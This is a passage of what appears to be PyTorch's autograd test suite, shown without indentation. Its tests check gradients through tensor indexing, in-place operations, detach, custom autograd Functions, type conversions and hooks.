check_index(x, y, (1, 1))
check_index(x, y, slice(1, None))
check_index(x, y, slice(None, 2))
check_index(x, y, (slice(None, 2), 2))
check_index(x, y, (slice(1, 2), 2))
check_index(x, y, (1, slice(2, None)))
check_index(x, y, (slice(None, None), slice(2, None)))
check_index(x, y, torch.LongTensor([0, 2]))
check_index(x, y, torch.rand(4, 4).bernoulli().bool())
check_index(x, y, (Ellipsis, slice(2, None)))
check_index(x, y, ([0], [0]))
check_index(x, y, ([1, 2, 3], [0]))
check_index(x, y, ([1, 2], [2, 1]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([slice(None), [2, 3]]))
check_index(x, y, ([[2, 3], slice(None)]))
# advanced indexing with fewer dims, or ellipsis
check_index(x, y, ([0]))
check_index(x, y, ([0], ))
x = torch.arange(1., 49).view(4, 3, 4)
y = Variable(x, requires_grad=True)
check_index(x, y, (slice(None), [0], [0]))
check_index(x, y, ([0], [0], slice(None)))
check_index(x, y, (slice(None), [0, 1, 2], [0]))
check_index(x, y, ([0, 1, 2], [0], slice(None)))
check_index(x, y, (slice(None), [1, 2], [2, 1]))
check_index(x, y, ([1, 2], [2, 1], slice(None)))
check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
check_index(x, y, (slice(None), slice(None), [2, 1]))
check_index(x, y, (slice(None), [2, 1], slice(None)))
check_index(x, y, ([2, 1], slice(None), slice(None)))
# advanced indexing with fewer dims, or ellipsis
check_index(x, y, ([0], ))
check_index(x, y, ([0], slice(None)))
check_index(x, y, ([0], Ellipsis))
check_index(x, y, ([1, 2], [0, 1]))
check_index(x, y, ([1, 2], [0, 1], Ellipsis))
check_index(x, y, (Ellipsis, [1, 2], [0, 1]))
# advanced indexing, with a tensor wrapped in a variable
z = torch.LongTensor([0, 1])
zv = Variable(z, requires_grad=False)
seq = [z, Ellipsis]
seqv = [zv, Ellipsis]
if y.grad is not None:
with torch.no_grad():
y.grad.zero_()
indexed_tensor = x[seq]
indexed_var = y[seqv]
compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx:
expected_grad[i] += 1
self.assertEqual(y.grad, expected_grad)
# with advanced indexing
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 3, 2, 1, 2], [0]]
y[idx].sum().backward()
expected_grad = torch.zeros(4, 4)
for i in idx[0]:
for j in idx[1]:
expected_grad[i][j] += 1
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 17).view(4, 4)
y = Variable(x, requires_grad=True)
idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
y[idx].sum().backward()
expected_grad = torch.tensor([[0., 2., 0., 0.],
[1., 0., 0., 0.],
[0., 1., 0., 0.],
[0., 0., 0., 0.]])
self.assertEqual(y.grad, expected_grad)
x = torch.arange(1., 65).view(4, 4, 4)
y = Variable(x, requires_grad=True)
idx = [[1, 1, 1], slice(None), slice(None)]
y[idx].sum().backward()
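# row 1 is selected three times, so every element of its gradient accumulates to 3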
expected_grad = torch.empty(4, 4, 4).zero_()
expected_grad[1].fill_(3)
self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
# Example from https://github.com/pytorch/pytorch/issues/24853.
# if `index(tensor, indices)` saves `tensor` for backwards, then it will
# trigger a version check on `tensor` during the backward pass, which
# will cause the following code to error because `tensor` gets modified
# by the indexing line.
a = torch.tensor([1., 0, 0])
b = torch.zeros(3, requires_grad=True)
tensor = b + 0
tensor[a != 0] = tensor[a != 0]
tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
v = torch.randn(3, 3)
with warnings.catch_warnings(record=True) as w:
self.assertFalse(v.volatile)
self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, tensor1, tensor2):
ctx.save_for_backward(tensor1, tensor2)
return tensor1 + tensor2
@staticmethod
def backward(ctx, grad_output):
var1, var2 = ctx.saved_variables
return (grad_output, grad_output)
with warnings.catch_warnings(record=True) as warns:
warnings.simplefilter("always")
x = torch.randn((3, 3), requires_grad=True)
y = torch.randn((3, 3), requires_grad=True)
MyFunction.apply(x, y).sum().backward()
has_deprecated = any('deprecated' in str(warn) and
'saved_variables' in str(warn)
for warn in warns)
self.assertTrue(has_deprecated)
def test_requires_grad(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
z = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertFalse(a.requires_grad)
b = a + z
self.assertTrue(b.requires_grad)
def error():
raise RuntimeError
# Make sure backward isn't called on these
a._backward_hooks = OrderedDict()
x._backward_hooks = OrderedDict()
y._backward_hooks = OrderedDict()
a._backward_hooks['test'] = error
x._backward_hooks['test'] = error
y._backward_hooks['test'] = error
b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5, requires_grad=True)
self.assertIs(x, x.requires_grad_())
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_())
self.assertTrue(y.requires_grad)
self.assertIs(x, x.requires_grad_(True))
self.assertTrue(x.requires_grad)
self.assertIs(y, y.requires_grad_(True))
self.assertTrue(y.requires_grad)
z = x * y
self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
self.assertIs(z, z.requires_grad_())
self.assertTrue(z.requires_grad)
self.assertIs(z, z.requires_grad_(True))
self.assertTrue(z.requires_grad)
self.assertIs(x, x.requires_grad_(False))
self.assertFalse(x.requires_grad)
self.assertIs(y, y.requires_grad_(False))
self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
# basic case, should be able to modify inplace while requires_grad is False
a = torch.randn(2, 3)
a.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# same but with a view
a = torch.randn(2, 3)
b = a[:]
b.add_(5)
a.requires_grad = True
a.sum().backward()
self.assertEqual(a.grad, torch.ones(2, 3))
# should fail if requires_grad = True when we modify inplace
a = torch.randn(2, 3)
b = a[:]
a.requires_grad = True
with self.assertRaises(RuntimeError):
a.add_(5)
with self.assertRaises(RuntimeError):
b.add_(5)
def test_attribute_deletion(self):
x = torch.randn((5, 5), requires_grad=True)
del x.grad
self.assertIsNone(x.grad)
with self.assertRaises(RuntimeError):
del x.data
with self.assertRaises(TypeError):
x.data = None
with self.assertRaises(RuntimeError):
del x.requires_grad
with self.assertRaises(RuntimeError):
del x._grad_fn
with self.assertRaises(RuntimeError):
del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
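# The same root is passed twice, so its gradient is accumulated twice into a and b.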
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
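# The advanced-index assignment saves tensors for backward, so a second
# backward without retain_graph must fail.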
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
try:
prev = torch.is_warn_always_enabled()
torch.set_warn_always(True)
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b * b
with warnings.catch_warnings(record=True) as ws:
c.backward(torch.ones_like(c), create_graph=True)
b.grad = None
self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
# Should not warn for grad
with warnings.catch_warnings(record=True) as ws:
torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
finally:
torch.set_warn_always(prev)
def test_next_functions(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
self.assertIsNotNone(a.grad_fn)
next_functions = a.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[0][1], 0)
self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
self.assertEqual(next_functions[1][1], 0)
b = a + 5
next_functions = b.grad_fn.next_functions
self.assertEqual(len(next_functions), 2)
self.assertIs(next_functions[0][0], a.grad_fn)
self.assertIs(next_functions[1][0], None)
def test_inplace(self):
x = torch.ones(5, 5, requires_grad=True)
y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
z = x * y
q = z + y
w = z * y
z.add_(2)
# Add doesn't need its inputs to do backward, so it shouldn't raise
q.backward(torch.ones(5, 5), retain_graph=True)
# Mul saves both inputs in forward, so it should raise
self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
z = x * y
q = z * y
r = z + y
w = z.add_(y)
# w is the last expression, so this should succeed
w.backward(torch.ones(5, 5), retain_graph=True)
# r doesn't use the modified value in backward, so it should succeed
r.backward(torch.ones(5, 5), retain_graph=True)
# q uses dirty z, so it should raise
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
with torch.no_grad():
x.grad.zero_()
m = x / 2
z = m + y / 8
q = z * y
r = z + y
prev_version = z._version
w = z.exp_()
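# exp_ saves its output (which z now aliases) for backward, so w stays
# differentiable; q saved the pre-exp_ z and will fail the version check below.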
self.assertNotEqual(z._version, prev_version)
r.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.ones(5, 5) / 2)
w.backward(torch.ones(5, 5), retain_graph=True)
self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
leaf = torch.ones(5, 5, requires_grad=True)
x = leaf.clone()
x.add_(10)
self.assertEqual(x, torch.ones(5, 5) * 11)
# x should be still usable
y = x + 2
y.backward(torch.ones(5, 5))
self.assertEqual(leaf.grad, torch.ones(5, 5))
z = x * y
x.add_(2)
self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
a = input + 1
b = input + 2
ctx.mark_non_differentiable(a)
return a, b
@staticmethod
def backward(ctx, grad_a, grad_b):
self.assertTrue((grad_a == 0).all())
self.assertTrue((grad_b == 1).all())
return grad_b
x = torch.randn(5, 5, requires_grad=True)
a, b = MyFunction.apply(x)
self.assertFalse(a.requires_grad)
self.assertTrue(b.requires_grad)
b.sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
# This used to segfault because MyFunction would send back null
# gradients to MulBackward, which is implemented in C++. C++
# implemented functions expect incoming grad_outputs to be non-null.
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input.clone()
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return None
x = torch.randn(5, 5, requires_grad=True)
r = MyFunction.apply(x * x)
(r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
class DoubleInplace(Function):
@staticmethod
def forward(ctx, x):
x.mul_(2)
ctx.mark_dirty(x)
return x, x
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def inplace_fn(x):
a, b = DoubleInplace.apply(x.clone())
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(inplace_fn, [x])
gradgradcheck(inplace_fn, [x])
# Can't modify leaf variables in-place
self.assertRaises(RuntimeError, lambda: DoubleInplace.apply(x))
# Functions which modify views in-place must return only one output
self.assertRaises(RuntimeError, lambda: DoubleInplace.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
y[index] = 2
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad = torch.ones(*size)
expected_grad[index] = 0
self.assertEqual(x.grad, expected_grad)
def _test_setitem_tensor(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
y_version = y._version
value = x.new(x[index].size()).fill_(7)
value.requires_grad = True
y[index] = value
self.assertNotEqual(y._version, y_version)
y.backward(torch.ones(*size))
expected_grad_input = torch.ones(*size)
expected_grad_input[index] = 0
self.assertEqual(x.grad, expected_grad_input)
self.assertEqual(value.grad, torch.ones_like(value))
# case where x broadcasts to match y[1]
x = torch.randn(4, requires_grad=True)
y = torch.zeros(2, 3, 4)
y[1] = x
y.backward(torch.randn(2, 3, 4))
self.assertEqual(x.size(), x.grad.size())
def test_setitem(self):
self._test_setitem((5, 5), 1)
self._test_setitem((5,), 1)
self._test_setitem((1,), 0)
self._test_setitem((10,), [[0, 4, 2]])
self._test_setitem((5, 5), [[0, 4], [2, 2]])
self._test_setitem((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5), 3)
self._test_setitem_tensor((5, 5), [[0, 1], [1, 0]])
self._test_setitem_tensor((5,), 3)
self._test_setitem_tensor((5,), Variable(torch.LongTensor([3]), requires_grad=False).sum())
self._test_setitem_tensor((5,), [[0, 1, 2, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), slice(None), [1, 3]])
self._test_setitem_tensor((5, 5, 5), [slice(None), [1, 3], slice(None)])
self._test_setitem_tensor((5, 5, 5), [[1, 3], slice(None), slice(None)])
self._test_setitem_tensor((5, 5, 5), [slice(None), [2, 4], [1, 3]])
self._test_setitem_tensor((5, 5, 5), [[1, 3], [2, 4], slice(None)])
self._test_setitem_tensor((5, 5, 5), [Variable(torch.LongTensor([1,
3]), requires_grad=False), [2, 4], slice(None)])
def test_setitem_mask(self):
mask = torch.BoolTensor(5, 5).bernoulli_()
self._test_setitem((5, 5), Variable(mask))
self._test_setitem((5,), Variable(mask[0]))
self._test_setitem((1,), Variable(mask[0, 0:1]))
self._test_setitem_tensor((5, 5), Variable(mask))
self._test_setitem_tensor((5,), Variable(mask[0]))
def test_select_sum(self):
# both select and sum return Scalars in ATen; ensure they work together.
x = torch.randn(10, dtype=torch.double, requires_grad=True)
def func(x):
return x.select(0, 1).sum()
gradcheck(func, [x])
gradgradcheck(func, [x])
def test_diagonal_expanded_v(self):
value = torch.rand([])
v_expanded = torch.tensor(value).expand(10)
a = torch.rand(10, 10, dtype=torch.double, requires_grad=True)
result, = torch.autograd.grad(a.diagonal(), a, v_expanded)
self.assertEqual(result, torch.eye(10, dtype=torch.double) * value)
def test_select_expanded_v(self):
v_expanded = torch.rand(10).expand(10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[0], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[0] = v_expanded
self.assertEqual(result, expected)
def test_slice_expanded_v(self):
v_expanded = torch.rand(10, 1).expand(2, 10, 10)
a = torch.rand(10, 10, 10, requires_grad=True)
result, = torch.autograd.grad(a[3:5], a, v_expanded)
expected = torch.zeros(10, 10, 10)
expected[3:5] = v_expanded
self.assertEqual(result, expected)
# TODO: opinfo this or move to unbind's test suite
def test_unbind(self):
stacked = torch.randn(3, 10, 10, requires_grad=True)
x, y, z = stacked.unbind()
grad = torch.randn(3, 10, 10)
torch.autograd.backward([x, y, z], grad.unbind())
self.assertEqual(stacked.grad, grad)
# check that it works with only one gradient provided (#9977)
for i in range(3):
stacked = torch.randn(3, 10, 10, requires_grad=True)
outs = stacked.unbind()
gi = grad.unbind()[i]
g, = torch.autograd.grad(outs[i], stacked, gi)
g_expected = torch.stack([gi if j == i else torch.zeros_like(gi)
for j in range(3)], dim=0)
self.assertEqual(g, g_expected)
# TODO: opinfo this or move to fill's test suite
def test_fill(self):
root = torch.randn(4, 5, requires_grad=True)
def func(root):
x = root.clone()
x.fill_(2)
return x
gradcheck(func, [root])
gradgradcheck(func, [root])
def test_unused_output(self):
x = torch.randn(10, 10, requires_grad=True)
outputs = x.chunk(5)
o = outputs[2]
o = o * 4 + 2
o.sum().backward()
expected_grad = torch.zeros(10, 10)
expected_grad[4:6] = 4
self.assertEqual(x.grad, expected_grad)
with torch.no_grad():
x.grad.zero_()
grad_output = torch.randn(2, 10)
outputs = x.chunk(5)
outputs[0].backward(grad_output)
expected_grad = torch.zeros(10, 10)
expected_grad[:2] = grad_output
self.assertEqual(x.grad, expected_grad)
# TODO: opinfo this or move to the sparse test suite
def _test_sparse_gather(self, size_x, size_ind, dim):
x = torch.randn(size_x, requires_grad=True)
if len(size_ind) > 0 and len(size_x) > 0:
ind = torch.randint(x.size(dim), size_ind)
else:
ind = torch.zeros(size_ind, dtype=torch.int64)
out = torch.gather(x, dim, ind, sparse_grad=False)
grad = torch.rand_like(out)
out.backward(grad)
grad_dense = x.grad.clone()
x.grad = None
out = torch.gather(x, dim, ind, sparse_grad=True)
out.backward(grad)
self.assertEqual(grad_dense, x.grad.to_dense())
def test_sparse_gather_dim0(self):
self._test_sparse_gather((10, 10), (5, 10), 0)
def test_sparse_gather_dim1(self):
self._test_sparse_gather((10, 10, 5), (10, 5, 5), 1)
def test_sparse_gather_dim_neg(self):
self._test_sparse_gather((10, 10, 5), (10, 10, 2), -1)
def test_sparse_gather_ind_scalar(self):
self._test_sparse_gather((10,), (), 0)
def test_sparse_gather_x_scalar(self):
self._test_sparse_gather((), (2,), 0)
def test_sparse_gather_both_scalar(self):
self._test_sparse_gather((), (), 0)
def test_gc_in_destructor(self):
"""
Previously, if a Function destructor triggered a garbage collection,
the Variable's tp_dealloc handler would get called twice leading to a
segfault.
"""
class CollectOnDelete(Function):
def forward(self, x):
return x
def backward(self, grad_output):
return grad_output
def __del__(self):
gc.collect()
for _ in range(10):
CollectOnDelete().forward(torch.randn(1, requires_grad=True)).backward()
def test_naughty_autograd_function_attribute_access(self):
class Id(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, grad_x):
return grad_x
with self.assertWarnsRegex(DeprecationWarning, "should not be instantiated"):
f = Id()
# After raising the warning, it should still return an instance
self.assertIsInstance(f, Id)
x = torch.zeros(1, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "non-static forward method is deprecated"):
f(x)
t = Id.apply(x)
self.assertEqual(t.grad_fn.name(), "IdBackward")
# THPFunction is the base class of both grad_fn and autograd functions,
# which means that a lot of accessors on them may segfault. Test that we
# properly error in this case.
t = torch.ones(1, requires_grad=True)
t._backward_hooks = dict()
with self.assertRaisesRegex(RuntimeError, "Attribute '_register_hook_dict' is invalid"):
f._register_hook_dict(t)
with self.assertRaisesRegex(RuntimeError, "Attribute 'register_hook' is invalid"):
f.register_hook(lambda x, y: None)
with self.assertRaisesRegex(RuntimeError, "Attribute 'next_functions' is invalid"):
f.next_functions
with self.assertRaisesRegex(RuntimeError, "Attribute 'name' is invalid"):
f.name()
with self.assertRaisesRegex(RuntimeError, "underlying PyNode has already been deallocated"):
f.metadata
@unittest.expectedFailure
def test_naughty_anomaly_access(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, g):
return g
x = torch.zeros(1, requires_grad=True)
y = MyFunction.apply(x)
y.backward()
y.grad_fn.metadata
g = y.grad_fn
del y
g.metadata # this currently fails, but shouldn't
def test_naughty_autograd_function_stashing_ctx(self):
saved_ctx = []
class Id(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, grad_x):
saved_ctx.append(ctx)
return ctx.saved_tensors
p = torch.zeros(1, requires_grad=True)
loss = Id.apply(p)
loss.backward(retain_graph=True)
del loss
# At this point, it complains that the graph has been freed
# (which is indeed true, although a somewhat indirect way of stating
# the problem).
self.assertRaises(RuntimeError, lambda: saved_ctx[0].saved_tensors)
def test_custom_autograd_repeated_grad_grad(self):
# This test failed the equality check in PR #22983; it's an interesting
# and different test case worth enshrining. mult1 is not testing
# anything particularly interesting, but mult2 is the interesting case.
def mult1(x):
return x.prod(dim=-1).prod(dim=-1)
class Mult(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = mult1(x)
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return (grad_output * y)[:, None, None] / x
mult2 = Mult.apply
def check_gradgrad_repeated(x, y):
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_1, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
gy, = torch.autograd.grad(y[0], x, create_graph=True)
ggy_2, = torch.autograd.grad(gy[0, 0, 0], x, retain_graph=True)
self.assertEqual(ggy_1[0, 0, 1], ggy_2[0, 0, 1])
x = torch.ones(2, 4, 4).requires_grad_()
check_gradgrad_repeated(x, mult1(x))
check_gradgrad_repeated(x, mult2(x))
def test_custom_autograd_no_early_free(self):
# Prior to #22983, this test failed complaining that buffers had
# already been freed. Also a pretty interesting test case.
class Double(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
y = x ** 2
ctx.save_for_backward(x, y)
return y
@staticmethod
def backward(ctx, grad_output):
x, _ = ctx.saved_tensors
return grad_output * 2 * x
# this is equivalent, but uses the output of .forward() in .backward()
class Double2(Double):
@staticmethod
def backward(ctx, grad_output):
x, y = ctx.saved_tensors
return grad_output * 2 * y / x
double = Double.apply
double2 = Double2.apply
x = torch.tensor(2).double().requires_grad_()
self.assertTrue(gradcheck(double, x))
self.assertTrue(gradgradcheck(double, x))
self.assertTrue(gradcheck(double2, x))
self.assertTrue(gradgradcheck(double2, x))
y = double(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x)
y = double2(x)
torch.autograd.grad(y, x, create_graph=True)
torch.autograd.grad(y, x) # should not error!
def test_detach(self):
x = torch.randn(10, 10, requires_grad=True)
y = x + 2
y = y.detach()
z = y * 4 + 2
self.assertFalse(y.requires_grad)
self.assertFalse(z.requires_grad)
x = torch.randn(10, 10, requires_grad=True)
y = x * 2
y = y.detach()
self.assertFalse(y.requires_grad)
self.assertIsNone(y.grad_fn)
z = x + y
z.sum().backward()
# This is an incorrect gradient, but we assume that's what the user
# wanted. detach() is an advanced option.
self.assertEqual(x.grad, torch.ones(10, 10))
# in-place detach
x = torch.randn(10, 10, requires_grad=True)
y = torch.randn(10, 10, requires_grad=True)
a = x * 2
(y + a).sum().backward(retain_graph=True)
a.detach_()
self.assertFalse(a.requires_grad)
(y + a).sum().backward() # this won't backprop to x
self.assertEqual(x.grad, torch.ones(10, 10) * 2)
self.assertEqual(y.grad, torch.ones(10, 10) * 2)
# in-place detach on a view raises an exception
view = x.narrow(0, 1, 4)
self.assertRaisesRegex(RuntimeError, 'view', lambda: view.detach_())
def test_detach_base(self):
"detaching base does not detach view"
x = torch.randn(10, 10, requires_grad=True)
view = x.narrow(0, 1, 4)
x.detach_()
self.assertFalse(x.requires_grad)
self.assertTrue(view.requires_grad)
self.assertIsNotNone(view.grad_fn)
self.assertIs(view._base, x)
def _test_type_conversion_backward(self, t):
fvar = Variable(t(torch.randn(5, 5).float()), requires_grad=True)
fvar.double().sum().backward()
self.assertEqual(fvar.grad, torch.ones_like(fvar))
self.assertEqual(type(fvar.grad), type(fvar))
dvar = Variable(t(torch.randn(5, 5).double()), requires_grad=True)
dvar.float().sum().backward()
self.assertEqual(dvar.grad, torch.ones_like(dvar))
self.assertEqual(type(dvar.grad), type(dvar))
def test_type_conversions(self):
x = torch.randn(5, 5)
self.assertIsInstance(x.float(), torch.FloatTensor)
self.assertIsInstance(x.int(), torch.IntTensor)
if torch.cuda.is_available():
self.assertIsInstance(x.float().cuda(), torch.cuda.FloatTensor)
self.assertIsInstance(x.int().cuda(), torch.cuda.IntTensor)
self.assertIsInstance(x.int().cuda().cpu(), torch.IntTensor)
if torch.cuda.device_count() >= 2:
x2 = x.float().cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
x2 = x.float().cuda()
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 0)
x2 = x2.cuda(1)
self.assertIsInstance(x2, torch.cuda.FloatTensor)
self.assertIs(x2.get_device(), 1)
y = Variable(torch.randn(5).cuda(1), requires_grad=True)
y.cpu().sum().backward()
self.assertIs(y.grad.get_device(), 1)
self.assertIs(y.long().get_device(), 1)
for t in [torch.DoubleTensor, torch.FloatTensor, torch.IntTensor, torch.ByteTensor]:
for y_var in (True, False):
y = torch.randint(5, (5, 5), dtype=t.dtype)
y = Variable(y) if y_var else y
self.assertIsInstance(x.type(t), t)
self.assertIsInstance(x.type_as(y), t)
# TODO: t.dtype should work
t_dtype = t().dtype
self.assertIsInstance(x.type(t_dtype), t)
self.assertIs(t_dtype, x.type(t_dtype).dtype)
self.assertEqual(y.data_ptr(), y.type(t).data_ptr())
if torch.cuda.is_available():
for x_cuda in (True, False):
for y_cuda in (True, False):
x_c = x.cuda() if x_cuda else x
y_c = y.cuda() if y_cuda else y
_, y_type = y_c.type().rsplit('.', 1)
y_typestr = ('torch.cuda.' if y_cuda else 'torch.') + y_type
self.assertEqual(y_c.type(), x_c.type(y_typestr).type())
self.assertIs(y_c.dtype, x_c.type(y_c.dtype).dtype)
self.assertEqual(y_c.data_ptr(), y_c.cuda().data_ptr() if y_cuda else y_c.data_ptr())
self._test_type_conversion_backward(lambda x: x)
if torch.cuda.is_available():
self._test_type_conversion_backward(lambda x: x.cuda())
if torch.cuda.device_count() >= 2:
# one of these has to be the non-default device
self._test_type_conversion_backward(lambda x: x.cuda(0))
self._test_type_conversion_backward(lambda x: x.cuda(1))
def test_isolated_node(self):
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
a = x + y
b = torch.max(a, 1, True)[1].repeat(1, 5).double()
o = (b + a).sum()
o.backward()
def test_shape(self):
x = torch.randn(3, 4)
self.assertEqual(2, len(x.shape))
self.assertEqual(x.shape[0], 3)
self.assertEqual(x.shape[1], 4)
def test_numpy_requires_grad(self):
x = torch.randn(2, 2, requires_grad=True)
err_msg_outputs = r"Can't call numpy\(\) on Tensor that requires grad. Use tensor.detach\(\).numpy\(\) instead."
with self.assertRaisesRegex(RuntimeError, err_msg_outputs):
x.numpy()
with torch.no_grad():
x.numpy()
x = torch.randn(2, 2)
x.numpy()
with torch.no_grad():
x.numpy()
def test_return_leaf(self):
class Identity(Function):
@staticmethod
def forward(ctx, a, b):
return a, a + b
@staticmethod
def backward(ctx, grad_a, grad_b):
return grad_a + grad_b, grad_b
hook_called = [False]
x = torch.randn(5, 5, requires_grad=True)
y = torch.randn(5, 5, requires_grad=True)
q, p = Identity.apply(x, y)
# Make sure hooks only receive grad from usage of q, not x.
def hook(grad):
hook_called[0] = True
self.assertEqual(grad, torch.ones(5, 5))
q.register_hook(hook)
(q + p + x).sum().backward()
self.assertEqual(x.grad, torch.ones(5, 5) * 3)
